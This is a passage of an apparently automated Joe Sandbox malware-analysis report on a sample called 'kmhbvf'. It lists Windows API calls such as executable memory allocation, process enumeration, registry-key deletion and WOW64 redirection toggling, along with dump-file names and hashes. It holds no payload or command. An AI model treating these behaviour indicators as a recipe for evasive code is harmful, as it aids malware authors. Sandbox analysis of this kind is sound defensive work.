                                                                  • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00F57A86
                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00F57A9A
                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F57ABE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window
                                                                  • String ID: SysMonthCal32
                                                                  • API String ID: 2326795674-1439706946
                                                                  • Opcode ID: 281ee5c916cf8258b4e7989de87fe84a2e0f5f6e37c9699e8632f78d6f6f582f
                                                                  • Instruction ID: d89497313cbab39e1582a8631f7c6c61d7804bcb92ba499bc4d010c46c99298e
                                                                  • Opcode Fuzzy Hash: 281ee5c916cf8258b4e7989de87fe84a2e0f5f6e37c9699e8632f78d6f6f582f
                                                                  • Instruction Fuzzy Hash: 8F21D332604218BFDF119F54DC42FEE3B69EF48724F110214FF156B1D0DAB5A855ABA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00F5826F
                                                                  • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00F5827D
                                                                  • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00F58284
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$DestroyWindow
                                                                  • String ID: msctls_updown32
                                                                  • API String ID: 4014797782-2298589950
                                                                  • Opcode ID: 23817664d2b235edc5322a387f399ce4192e26d8573cc57e464673d994d9c0d6
                                                                  • Instruction ID: 5f87305d923fd9de35d25a349150f2fe4f7359eedf28d08925dcfaa93d07ff29
                                                                  • Opcode Fuzzy Hash: 23817664d2b235edc5322a387f399ce4192e26d8573cc57e464673d994d9c0d6
                                                                  • Instruction Fuzzy Hash: 3F2181B1A04208AFDB10DF54CC85DA737EDEB593A4F150059FA01A7291CB71EC16EBA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00F57360
                                                                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00F57370
                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00F57395
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$MoveWindow
                                                                  • String ID: Listbox
                                                                  • API String ID: 3315199576-2633736733
                                                                  • Opcode ID: 500f406e960b4501f9422b256b7e7531248c0228669b2b5bd5ceab93254635f2
                                                                  • Instruction ID: 2da5b8a43a69c60d8516cb29d1e19217d69eef8295fc7037b248eaa978032c94
                                                                  • Opcode Fuzzy Hash: 500f406e960b4501f9422b256b7e7531248c0228669b2b5bd5ceab93254635f2
                                                                  • Instruction Fuzzy Hash: 0C21C532614218BFDF129F54DC45EBF3BAAEB89771F118124FE1097190C671AC55ABA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00F57D97
                                                                  • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00F57DAC
                                                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00F57DB9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: msctls_trackbar32
                                                                  • API String ID: 3850602802-1010561917
                                                                  • Opcode ID: 86a82553e0b3dfc62368091373ba81c5ed8b2ec0677dea53dd67bc16e6b9232b
                                                                  • Instruction ID: 356146c151dc36b528ff8375ea32d768d6bb9a6d10f1e92b3d79e49c91b3d82a
                                                                  • Opcode Fuzzy Hash: 86a82553e0b3dfc62368091373ba81c5ed8b2ec0677dea53dd67bc16e6b9232b
                                                                  • Instruction Fuzzy Hash: 8411E372644308BADF20AF64DC05FEB77A9EF88B24F114119FF41A6090D672D811EB20
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00EE4AF7,?), ref: 00EE4BB8
                                                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00EE4BCA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                  • API String ID: 2574300362-1355242751
                                                                  • Opcode ID: 7baeadd05074fb9cfd73ebd3c3ac7757655c6c8ad57610d35a712bb99af8dc91
                                                                  • Instruction ID: bcfb1fd6a48818f84f8cba99b3284cca3841b8607f14d42f7d214bed26a895d7
                                                                  • Opcode Fuzzy Hash: 7baeadd05074fb9cfd73ebd3c3ac7757655c6c8ad57610d35a712bb99af8dc91
                                                                  • Instruction Fuzzy Hash: B1D0C7B04003168FD320AF32DC08B8772E5AF01344B20AC2AD4A2E2691EFB0C880DA00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00EE4B44,?,00EE49D4,?,?,00EE27AF,?,00000001), ref: 00EE4B85
                                                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00EE4B97
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                  • API String ID: 2574300362-3689287502
                                                                  • Opcode ID: ea54bd2ee663566eaddbd5611fd208626c789da3d0ec1df0453261c92c6b3828
                                                                  • Instruction ID: 33bfd4297c2c9cd88647732da51b6441bb07faabe3d59a52b1439a7397be80cd
                                                                  • Opcode Fuzzy Hash: ea54bd2ee663566eaddbd5611fd208626c789da3d0ec1df0453261c92c6b3828
                                                                  • Instruction Fuzzy Hash: 88D017B09147168FD720AF32DC18B4776E4AF05355F259C2AD4A6E2690EAB0E880EA51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(advapi32.dll,?,00F51696), ref: 00F51455
                                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00F51467
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                                  • API String ID: 2574300362-4033151799
                                                                  • Opcode ID: 943f5e7f1e574d5b6471ad9c12add38c12d6b9a8e03e90160f38f7a3ebaf0326
                                                                  • Instruction ID: da488fe3425e9261010a4b632cf240ea9302dd809d0c707a6ecd35694bca226c
                                                                  • Opcode Fuzzy Hash: 943f5e7f1e574d5b6471ad9c12add38c12d6b9a8e03e90160f38f7a3ebaf0326
                                                                  • Instruction Fuzzy Hash: EDD01230910712CFD7209F75C84875776D4AF07396B11C82AD8E5D2950DAB0E4C4E751
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00EE5E3D), ref: 00EE55FE
                                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00EE5610
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                                                  • API String ID: 2574300362-192647395
                                                                  • Opcode ID: 96e737b1ac71837d628d0c9158d81ceafee2a70f72900ad7bba76585b35066a9
                                                                  • Instruction ID: 5682afa29c25631784bdd7e2f113ce31c321f0cac10fee845f21844940840e63
                                                                  • Opcode Fuzzy Hash: 96e737b1ac71837d628d0c9158d81ceafee2a70f72900ad7bba76585b35066a9
                                                                  • Instruction Fuzzy Hash: ABD01775920B179FE7209F32C90861776E5AF05359F259C2AD49AE2292EAB0C880DA51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00F493DE,?,00F60980), ref: 00F497D8
                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00F497EA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: GetModuleHandleExW$kernel32.dll
                                                                  • API String ID: 2574300362-199464113
                                                                  • Opcode ID: 4d9102eab8989c12bafee3ccd493e4743cb8b28b77796af7f2557d0905e4357e
                                                                  • Instruction ID: f9e06f342f3e8d33e9065a20ac1539f5bda0ed6dd5cdd81c21c16d0e4767053d
                                                                  • Opcode Fuzzy Hash: 4d9102eab8989c12bafee3ccd493e4743cb8b28b77796af7f2557d0905e4357e
                                                                  • Instruction Fuzzy Hash: BED012709107138FD7205F31D88864776D4AF05391B258C2AD895D2251EFB0C480E711
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0244e57681386c8f15ed14a55fadd860350d699b872360d2b3667d5568d6407e
                                                                  • Instruction ID: d7a8ec51b266a1a0939b790708e9f9e06f3a111e8bf844fa8f6931be29b9feb0
                                                                  • Opcode Fuzzy Hash: 0244e57681386c8f15ed14a55fadd860350d699b872360d2b3667d5568d6407e
                                                                  • Instruction Fuzzy Hash: 64C1AF75A04226EFCB14DF94D884EAEB7B5FF48310B218598E806DB251DB31ED81EB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • CharLowerBuffW.USER32(?,?), ref: 00F4E7A7
                                                                  • CharLowerBuffW.USER32(?,?), ref: 00F4E7EA
                                                                    • Part of subcall function 00F4DE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00F4DEAE
                                                                  • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00F4E9EA
                                                                  • _memmove.LIBCMT ref: 00F4E9FD
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharLower$AllocVirtual_memmove
                                                                  • String ID:
                                                                  • API String ID: 3659485706-0
                                                                  • Opcode ID: 2ea0a62f0e73a43eac764cefb1c04883ee033423c04875021ad19a470bcc68af
                                                                  • Instruction ID: a6cfc8ba1d97b2e502e24c946ad646576fa781ab0598eafdd7b1d6980726df52
                                                                  • Opcode Fuzzy Hash: 2ea0a62f0e73a43eac764cefb1c04883ee033423c04875021ad19a470bcc68af
                                                                  • Instruction Fuzzy Hash: FAC15A71A083419FC714DF28C480A6ABBE5FF89724F14896EF899DB351D731E946CB82
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • CoInitialize.OLE32(00000000), ref: 00F487AD
                                                                  • CoUninitialize.OLE32 ref: 00F487B8
                                                                    • Part of subcall function 00F5DF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00F48A0E,?,00000000), ref: 00F5DF71
                                                                  • VariantInit.OLEAUT32(?), ref: 00F487C3
                                                                  • VariantClear.OLEAUT32(?), ref: 00F48A94
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                  • String ID:
                                                                  • API String ID: 780911581-0
                                                                  • Opcode ID: 0fcd20485a76a75d6292928cee570df514bd4bc138ab3f70e429a5632ec8d508
                                                                  • Instruction ID: 84b95b87bb301e71dfed90b7afebbec0f470d854a2c6a92b3bc4bfa66c726641
                                                                  • Opcode Fuzzy Hash: 0fcd20485a76a75d6292928cee570df514bd4bc138ab3f70e429a5632ec8d508
                                                                  • Instruction Fuzzy Hash: 42A14575604B019FDB10DF14C481B2ABBE5FF88360F14884AF995AB3A1CB74ED42DB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00F63C4C,?), ref: 00F28308
                                                                  • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00F63C4C,?), ref: 00F28320
                                                                  • CLSIDFromProgID.OLE32(?,?,00000000,00F60988,000000FF,?,00000000,00000800,00000000,?,00F63C4C,?), ref: 00F28345
                                                                  • _memcmp.LIBCMT ref: 00F28366
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: FromProg$FreeTask_memcmp
                                                                  • String ID:
                                                                  • API String ID: 314563124-0
                                                                  • Opcode ID: 1bc6ae65d148d8e41e5a49ef5fb627e440fe5fc043085fa29c866594df549329
                                                                  • Instruction ID: 86a7094d1ae218dad72f8c582fef1c9f89fe312cfbc6058b6d274717e7f54405
                                                                  • Opcode Fuzzy Hash: 1bc6ae65d148d8e41e5a49ef5fb627e440fe5fc043085fa29c866594df549329
                                                                  • Instruction Fuzzy Hash: 37814871A01119EFCB04CFD4C884EEEB7B9FF89315F248598E516AB250DB71AE06DB60
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$AllocClearCopyInitString
                                                                  • String ID:
                                                                  • API String ID: 2808897238-0
                                                                  • Opcode ID: 099f5c799c451625cd8072bd1d56e8000a26921fa057de7f25adb648328c4c15
                                                                  • Instruction ID: 2767d82bb24eb2e74714198d8589d806a3ae68f3f89fe492a9d27e0b42024664
                                                                  • Opcode Fuzzy Hash: 099f5c799c451625cd8072bd1d56e8000a26921fa057de7f25adb648328c4c15
                                                                  • Instruction Fuzzy Hash: FE51D731608B169BCB20BF79A895B2DF7E4EF05320B30981FE556D72A1DF749840AB01
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00F4F526
                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00F4F534
                                                                    • Part of subcall function 00EE1A36: _memmove.LIBCMT ref: 00EE1A77
                                                                  • Process32NextW.KERNEL32(00000000,?), ref: 00F4F5F4
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00F4F603
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                  • String ID:
                                                                  • API String ID: 2576544623-0
                                                                  • Opcode ID: e926f10ff08940c82f95b1be763d5acd661eabc4c03811d8d646d1da069fa1ec
                                                                  • Instruction ID: d361878108c0ba2d3fcf5f65a7ac48b7ea328e64e0f9e8f63b591326cafb9217
                                                                  • Opcode Fuzzy Hash: e926f10ff08940c82f95b1be763d5acd661eabc4c03811d8d646d1da069fa1ec
                                                                  • Instruction Fuzzy Hash: 465190B15043149FD310EF20DC45E6BBBE8EF94710F10492EF995E72A1EB709909CB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetWindowRect.USER32 ref: 00F59E88
                                                                  • ScreenToClient.USER32 ref: 00F59EBB
                                                                  • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00F59F28
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ClientMoveRectScreen
                                                                  • String ID:
                                                                  • API String ID: 3880355969-0
                                                                  • Opcode ID: 5f165ece22bdb897eb6b8a3bb6c83dd7aa9409211d2cad9b0bc382a6c8df590a
                                                                  • Instruction ID: 8c7dc463b6fadc8a7fb7d474c2f698b1c64e38e580f8b931224a0c7aac62d21c
                                                                  • Opcode Fuzzy Hash: 5f165ece22bdb897eb6b8a3bb6c83dd7aa9409211d2cad9b0bc382a6c8df590a
                                                                  • Instruction Fuzzy Hash: 04514E34A04209EFCF14DF54C8859AE7BF6FB44321F248159FA25D72A0D771AD45EB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
